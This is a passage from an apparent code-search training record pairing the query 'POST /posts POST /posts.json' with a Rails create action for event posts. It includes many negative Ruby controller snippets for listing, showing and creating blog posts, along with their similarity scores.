"def show\n @user = User.find(params[:id])\n @posts = @user.posts\n\n respond_to do |format|\n format.json { render json: {user: User._build(@user), posts: Post.build_posts(@posts)}, location: root_path }\n end\n end",
"def index\n\t\tgon.posts = Post.all.as_json\n\tend",
"def index\n @posts = Post.order(\"created_at DESC\").where(:published => true).limit(5)\n @title = \"Home\"\n @description = \"the blog and website of bassist and programmer Johnny Grubb. no baseball information here.\"\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml\n end\n end",
"def display_posts\n begin\n response = RestClient.get \"#{@@DOMAIN}/api/posts.json?all\", authorization_hash\n\n puts \"Response code: #{response.code}\"\n puts \"Response cookies:\\n #{response.cookies}\\n\\n\"\n puts \"Response headers:\\n #{response.headers}\\n\\n\"\n puts \"Response content:\\n #{response.to_str}\"\n\n js = JSON response.body\n js.each do |item_hash|\n item_hash.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def show\n #@post = Post.find(params[:id])\n\n #respond_to do |format|\n # format.html # show.html.erb\n #format.json { render json: @post }\n #end\n end",
"def index\n @posts = Post.all\n @posts = paginate(@posts)\n authorize @posts\n\n render json: @posts, each_serializer: Api::V1::PostSerializer, meta: meta_attributes(@posts)\n end",
"def index\n @posts = Post.find(:all)\n end",
"def show\n @post = current_user.posts.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n render json: { posts: current_user.posts.all.map(&:to_h) }\n end",
"def show\n @feed = Feed.find(params[:id])\n @posts = @feed.posts.order(\"published desc\").paginate(:page => params[:page], :per_page => 20)\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @feed }\n end\n end",
"def index\n\t@posts = list_posts\n end",
"def show\n #GET a single post by ID\n @post = Post.find(params[:id])\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def show\n @post = Post.find(params[:id])\n @title = @post.title\n respond_to do |format|\n format.html # show.html.erb\n format.json { render :json => @post }\n end\n end",
"def index\n # TODO: implement listing all posts\n end",
"def index\n @posts = Post.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n format.xml { render xml: @posts }\n end\n end",
"def show\n @blogpost = Blogpost.published.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blogpost }\n end\n end",
"def show\n # @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n # format.json { render json: @post }\n end\n end",
"def post(postid)\n request(:id => postid).posts.first\n end",
"def show\n Rails.logger.debug(\"Inside show \")\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @posto = Posto.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @posto }\n end\n end",
"def show\n @post = Post.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n #format.json { render json: @post }\n format.json do\n render :json => @post.to_json(:only => [:id, :title, :text, :lat, :lng, :created_at, :post_type, :likes], \n :methods => [:image_url, :video_url], \n :include => [:comments])\n end\n end\n end",
"def display_post\n begin\n # asks the user for the post id\n print \"Enter the post ID: \"\n id = STDIN.gets.chomp\n response = RestClient.get \"#{@@DOMAIN}/api/posts/#{id}.json\", authorization_hash\n\n js = JSON response.body\n js.each do |k, v|\n puts \"#{k}: #{v}\"\n end\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def index\n @posts = Post.all.reverse\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @posts }\n end\n end",
"def index\n @posts = PostService.getAllPosts\n end",
"def show\n render json: {\n data: @post\n }\n end",
"def show\n @post = Post.find(params[:id])\n @videos = Video.get_for @post #where([\"post_id = ?\", params[:id]]).all\n @background = get_background_for @post #Background::DEFAULT #Background.where([\"post_id = ?\", params[:id]])\n @nav = get_navigation :for => 'post', :current => @post\n @menu = get_menu :for => 'post'\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def index\n @posts = Post.order(created_at: :desc)\n respond_to do |format|\n format.html { render }\n format.text { render }\n format.xml { render xml: @posts }\n format.json { render json: @posts.to_json }\n end\n end",
"def get(options = {})\n response= handle_errors { self.class.get('/get', :query => options)}\n if response[\"posts\"][\"post\"].is_a?(Hash)\n Rubycious::Post.new response[\"posts\"][\"post\"]\n elsif response[\"posts\"][\"post\"].is_a?(Array)\n response[\"posts\"][\"post\"].collect{|i| Rubycious::Post.new(i)}\n else\n nil\n end\n end",
"def show\n if !params[:id]\n @post = Post.find_by_title('Welcome')\n elsif params[:id] =~ /^[a-zA-Z ]+$/\n @post = Post.find_by_title(params[:id])\n else\n @post = Post.find(params[:id].to_i)\n end\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post }\n end\n end",
"def show\n @blogpost = Blogpost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blogpost }\n end\n end",
"def show\n @blog_post = BlogPost.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @blog_post }\n end\n end",
"def index\n @post = Post.find_by_id(params[:post_id])\n if @post.nil?\n return render json: { error: \"Post not found\" }, status: :not_found\n end\n render json: @post.comments,status: 200\n end",
"def show\n @post2 = Post2.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @post2 }\n end\n end"
] |
[
"0.77110183",
"0.73537844",
"0.73433185",
"0.73379177",
"0.73228735",
"0.7293139",
"0.7275997",
"0.7256934",
"0.7161576",
"0.7158913",
"0.71552676",
"0.71552676",
"0.7119547",
"0.7094749",
"0.7094749",
"0.7094749",
"0.70943594",
"0.7071599",
"0.70607626",
"0.70452625",
"0.7032558",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.7020259",
"0.69897074",
"0.6955722",
"0.6955722",
"0.6954564",
"0.6937062",
"0.6936725",
"0.69257236",
"0.6917876",
"0.69010335",
"0.69005007",
"0.6894985",
"0.6893989",
"0.68756175",
"0.6860515",
"0.6853294",
"0.6853291",
"0.6847577",
"0.68364173",
"0.68232405",
"0.68093437",
"0.6804144",
"0.67621773",
"0.6743674",
"0.67226875",
"0.6720067",
"0.67147297",
"0.6713107",
"0.6699554",
"0.6693189",
"0.6679935",
"0.6655543",
"0.6644503",
"0.6641595",
"0.66299",
"0.6619761",
"0.66178924",
"0.66124725",
"0.6608166",
"0.66017526",
"0.6597235",
"0.65952027",
"0.65909946",
"0.65858185",
"0.6582703",
"0.658145",
"0.65768254",
"0.65733755",
"0.6568626",
"0.65668",
"0.655592",
"0.65385455",
"0.6525845",
"0.65144473",
"0.6513119",
"0.6497587",
"0.6497312",
"0.6493223",
"0.6491053",
"0.64720887",
"0.6471776",
"0.64655757",
"0.6455566",
"0.64530945",
"0.6448596",
"0.64456475",
"0.64289075"
] |
0.0
|
-1
|
POST /posts POST /posts.json
|
def create
@calendar = Calendar.find(params[:calendar_id])
@event = Event.find(params[:event_id])
if @event.posts.create(post_params)
redirect_to url_for([@calendar,@event]),
notice: 'Post successfully created.'
else
redirect_to calendar_event_path(:calendar,:event),
alert: 'Error on creating post'
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n render json: Post.create(params[\"post\"])\n end",
"def create\n respond_with Post.create(params[:posts])\n end",
"def create\n @post = Post.create(post_params)\n render json: @post, serializer: PostSerializer\n end",
"def create\n @post = Post.new(post_params)\n @post.user = current_user\n\n if @post.save\n render json: @post, status: :created, location: api_v1_post_path(@post), serializer: Api::V1::PostSerializer\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = current_user.posts.new(post_params)\n\n if @post.save\n render json: {\n data: @post\n }\n else\n render json: {\n errors: @post.errors\n }\n end\n end",
"def create\n post = @current_user.posts.create(post_params)\n\n if post.save\n render json: post\n else\n render json: { errors: post.errors.full_messages }, status: :forbidden\n end\n end",
"def create\n title = params[:title]\n body = params[:body]\n\n @post = current_user.posts.create(title: title, body: body)\n\n if @post.save!\n json_response(@post)\n else\n json_response(@post.errors)\n end\n end",
"def create\n @post = Post.new({ :title => params[:post][:title] })\n \n respond_to do |format|\n if @post.save\n format.json { render :json => { :post => @post.as_json}, :status => :created, :location => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @user = User.find(params[:user_id])\n @post = @user.posts.new(post_params)\n\n if @post.save\n render json: @post, status: :created, location: [@user, @post]\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(post_params)\n\n if @post.save\n render json: {\n message: 'Post was successfully created.'\n }, status: :created\n else\n render json: {\n errors: @post.errors,\n message: 'Post could not be created.'\n }, status: :unprocessable_entity\n end\n end",
"def post(id, opts = {})\r\n uri = url_for(\"posts/#{id}\", opts)\r\n response = RestClient.get(uri)\r\n JSON.parse response\r\n end",
"def create\n\n\n @post = current_user.posts.build(post_params)\n\n if @post.save\n\n render json: \"Posted successfully\", status: 201\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(params[:post])\n respond_to do |format|\n if @post.save\n format.json { render :json => @post }\n else\n format.json { render :json => @post.errors, :status => :unprocessable_entity}\n end\n end\n #respond_with Post.create(params[:post])\n end",
"def create\n\t\tpost = @current_user.posts.create(post_params) \n\t\tif post.save\n\t\trender json: {success: true, auth_token: @current_user.authentication_token, post_id: post.id}\n\t else\n\t render json: {success: false, errors: post.errors.full_messages, message: \"Validation failed\"}, status: 422\n\t\tend \n\tend",
"def create_posts\n end",
"def create_posts\n end",
"def create_post\n begin\n #asks the user for the title, body, and whether it should be anonymous\n print \"Title: \"\n title = STDIN.gets.chomp\n print \"Body: \"\n body = STDIN.gets.chomp\n print \"Post as Anonymous? (y/n): \"\n anonymous = STDIN.gets.chomp.upcase == 'Y' ? true : false\n # check user information from login\n\n # Rails will reject this unless you configure the cross_forgery_request check to\n # a null_session in the receiving controller. This is because we are not sending\n # an authenticity token. Rails by default will only send the token with forms /users/new and\n # /users/1/edit and REST clients don't get those.\n # We could perhaps arrange to send this on a previous\n # request but we would then have to have an initial call (a kind of login perhaps).\n # This will automatically send as a multi-part request because we are adding a\n # File object.\n response = RestClient.post \"#{@@DOMAIN}/api/posts.json\",\n\n {\n post: {\n title: title,\n body: body,\n anonymous: anonymous\n },\n }, authorization_hash\n\n if (response.code == 201)\n puts \"Created successfully\"\n end\n puts \"URL for new resource: #{response.headers[:location]}\"\n rescue => e\n puts STDERR, \"Error accessing REST service. Error: #{e}\"\n end\n end",
"def create\n @api_post = Api::Post.new(api_post_params)\n\n if @api_post.save\n render json: @api_post, status: :created, location: @api_post\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.json { render :show, status: :created, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n \tif logged_in?\n params[:post][:user_id] = current_user.id\n @post = Post.new(post_params)\n if @post.save\n puts @post.published\n render json: @post\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end\n end",
"def create\n respond_with Post.create(post_params)\n end",
"def posts(opts)\n response = get(\"posts\", opts)\n response\n end",
"def post(*args)\n request(:post, *args)\n end",
"def post(*args)\n request :post, *args\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @api_post = current_user.posts.new(api_post_params)\n if @api_post.save\n render :show\n else\n render json: @api_post.errors, status: :unprocessable_entity\n end\n end",
"def create\n authenticated\n\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new post_params\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n if @post.save\n render :show, status: :created, location: @post\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n puts \"create post: #{post_params.inspect}\"\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @title = \"Create New Post\"\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, :notice => 'Post was successfully created.' }\n format.json { render :json => @post, :status => :created, :location => @post }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @post.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def json_post\n @content_type = 'text/plain'\n @render_nothing = true\n @rendered_template = true\n @current_layout = nil\n puts \"json_post: submitting #{params[:path]}\" if @@debug\n path = params[:path]\n if path\n puts \"json_post: path is #{path} l=#{path.length}\" if @@debug\n path = path.split('/').compact()\n path.delete('')\n # you cannot make rooted nodes via json atm... fix? xxx\n if path.length > 1\n name = path.pop\n nodes = Note.make_path @user,path\n puts \"json_post: making at path #{path.join('/')}\" if @@debug\n if nodes\n note = nodes.last.make_child @user,params,name\n puts \"json_post: made child #{note} from #{name} l=#{name.length}\"\n params[:path] = path.join('/') # for call to json_query\n # it is important to do a query rather than returning the note; to get freshest order\n json_query\n return\n #write_json note if note\n end\n end\n end\n render :nothing => true\n end",
"def create\n post_service = PostService.new(current_user, params)\n post_service.create_post\n #post_service.create\n respond_to do |format|\n if post_service.save?\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { redirect_to new_post_url, alert: post_service.errors }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.json { render json: @post, status: :created, location: @post }\n format.xml { render xml: @post, status: :created, location: @post }\n else\n format.json { render json: @post.errors, status: :unprocessable_entity }\n format.xml { render xml: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #raise params.inspect\n \n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @posts = Post.page(params[:page]).order('created_at desc')\n @post = Post.new(post_params)\n @user = User.where('account_id == ?', current_account.id)[0]\n respond_to do |format|\n if @post.save\n format.html { redirect_to '/posts' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :index }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\t\t\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n user_post_param\n respond_to do |format|\n if @post.save\n format.html do\n redirect_to @post, notice:\n \"Post was successfully created.\"\n end\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json do\n render json: @post.errors, status:\n :unprocessable_entity\n end\n end\n end\n end",
"def create\n @api_v1_post = Api::V1::Post.new(api_v1_post_params)\n\n respond_to do |format|\n if @api_v1_post.save\n format.html { redirect_to @api_v1_post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @api_v1_post }\n else\n format.html { render :new }\n format.json { render json: @api_v1_post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = current_user.posts.new(params[:post])\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n @post.user_id = current_user.id\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { redirect_to posts_path, flash: { error: @post.errors.full_messages } }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def post(path, data = {})\n request 'POST', path, body: data.to_json\n end",
"def new\n post = Post.new\n render json: post\n end",
"def create\n @user = current_user\n @post = @user.posts.build(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: \"new\" }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save?\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { render action: 'new' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\r\n @post = Post.new(params[:post])\r\n\r\n respond_to do |format|\r\n if @post.save\r\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\r\n format.json { render json: @post, status: :created, location: @post }\r\n else\r\n format.html { render action: \"new\" }\r\n format.json { render json: @post.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def create\n @post = Post.create(post_params)\n set_posts\n respond_to do |format|\n format.js\n format.html\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: \"Post was successfully created.\" }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(params[:post])\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to posts_path, :notice => \"slam\" }\n format.json { render json: @post, status: :created, location: @post }\n else\n format.html { redirect_to posts_path }\n flash[:alert] = \"shit.\"\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n post\n end",
"def create\n @post = Post.new(content: params[:post][:content], user_id: @user.id)\n respond_to do |format|\n if @post.save\n format.html { redirect_to @user }\n format.json { render :show, status: :created, location: @user }\n else\n format.html { redirect_to @user }\n format.json { render json: @user.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @post = Post.new(post_params)\n\n respond_to do |format|\n if @post.save\n format.html { redirect_to @post, notice: 'Post was successfully created.' }\n format.json { render :show, status: :created, location: @post }\n else\n format.html { render :new }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n\n end",
"def create\n @post = Post.new(post_params)\n @post.user_id = params[:user_id]\n if @post.save\n render json: @post, meta: { status: :created }, meta_key: 'result', status: :created\n else\n render json: @post.errors, status: :unprocessable_entity\n end\n end",
"def create\n @post = current_user.posts.new(post_params.merge(writter: current_user.name))\n\n if @post.save\n render json: {status: 1, id: @post.id.to_s, notice: \"新增成功,标题是:#{@post.title.capitalize}\", number: @post.number, errors: []}\n else\n render json: {status: -1, notice: \"新增失败,请先登录\", errors: @post.errors.full_messages}\n end\n end",
